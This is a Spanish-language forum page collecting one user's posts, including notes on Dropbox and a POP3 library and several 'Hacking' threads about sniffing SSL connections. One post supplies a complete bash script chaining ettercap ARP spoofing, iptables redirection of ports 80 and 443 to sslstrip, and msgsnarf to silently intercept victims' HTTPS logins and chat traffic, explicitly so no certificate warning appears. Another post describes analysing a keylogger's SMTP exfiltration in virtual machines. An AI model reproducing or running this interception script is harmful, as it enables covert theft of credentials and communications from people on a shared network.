Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - UsuarioEquis

#1
DROPBOX

Es un servicio de almacenamiento gratuito en Internet, el espacio inicial es de 2Gb
pero se puede expander hasta 8Gb.

A este servicio se puede acceder desde una Computadora hasta un Telefono Movil.


LINK: https://www.dropbox.com/



Editado: no links con referrals para ganar espacio.
#2
Yo utilizo el ettercap para arpspoofing y para snifear, y luego redirijo los puerto 80 y 443 al sslstrip, porque si lo dejo que lo haga el ettercap, a la victima le aparece en el browser una advertencia de certificado erróneo.

Aca te dejo un script que arme, create un archivo snifeototal.sh y pega el contenido del texto que escribo a continuación, luego de grabar #chmod 777 snifeototal.sh
y por ultimo #./snifeototal.sh, espero que te sirva.

texto a copiar:

echo
echo "Full Sniffing-----------------"
echo "-------------by Usuario Equis"
echo
echo -n "Adaptador de RED: "
read -e ADAPT
echo -n "Puerta de Enlace o Gateway: "
read -e GATEW
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -F
xterm -geometry 75x75+1+1 -T "ARP Spoofing con Ettercap" -e ettercap -Tq -M arp:remote /$GATEW/ // -P autoadd -i $ADAPT -m /tmp/capturaetter.log
sleep 1
iptables -t nat -L -n
sleep 1
iptables -t nat -D PREROUTING 1
iptables -t nat -D PREROUTING 1
iptables -t nat -L -n
sleep 1
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
iptables -t nat -A PREROUTING -p tcp --dport 443 -j  REDIRECT --to-port 10000
xterm -geometry 75x35+1+100 -T "SSLStrip" -e sslstrip -k -l 10000 -a -w /tmp/captura.log
sleep 1
xterm -geometry 75x35+1+200 -T "Visualizacion del Log" -e tail -f /tmp/captura.log
xterm -geometry 75x35+1+300 -T "Visualizacion del Log de Ettercap" -e tail -f /tmp/capturaetter.log
xterm -geometry 75x35+1+400 -T "Messenger" -e msgsnarf -i $ADAPT



#3
Hacking / Re: SNIFFEO DE CONEXIONES SSL
25 Abril 2011, 05:53 AM
Se me ocurrió esta otra manera de modo local

[youtube=425,350]http://www.youtube.com/watch?v=y38Ts_k-vGU[/youtube]

Me parece mejor ya que veo todo el trafico de esa conexion

::)
#4
OstroSoft POP3 Component (OSPOP3) is a .NET library for retrieving emails programmatically. Works with POP3 mailboxes. Supports secure email(TLS/SSL), email (MIME) attachments, HTML email, custom headers, embedded objects.


http://www.ostrosoft.com/POP3_component.asp


Unlimited usage for developing non-commercial applications.

#5
Hacking / SNIFFEO DE CONEXIONES SSL
16 Abril 2011, 15:49 PM
Necesito saber si alguien tiene alguna otra idea de como solucionar este tema de modo local, Baje de Internet una aplicación  que estaba infectada con un keylogger (Ardamax) me puse sniffear, y encontré que establecía una conexión al smtp de gmail, por el puerto 465 (SSL).
Como la conexion estaba cifrada el sniffer no me servia.
Lo que se me ocurrio fue infectar una maquina virtual con windows xp, y desde otra maquina virtual con Backtrack, utilizando el Ettercap junto a su función "Man the Middle", lo pude lograr.

Acá dejo el video del modo en que lo realice.

http://vimeo.com/22362014

Tambien pense si hay alguna tool que simule ser un servidor de smtp con ssl, y modificar el archivo hosts y ponerle el dominio de gmail apuntando al localhost, pero no logre encontrar esa aplicacion (si alguien sabe si existe) tipo un honeypot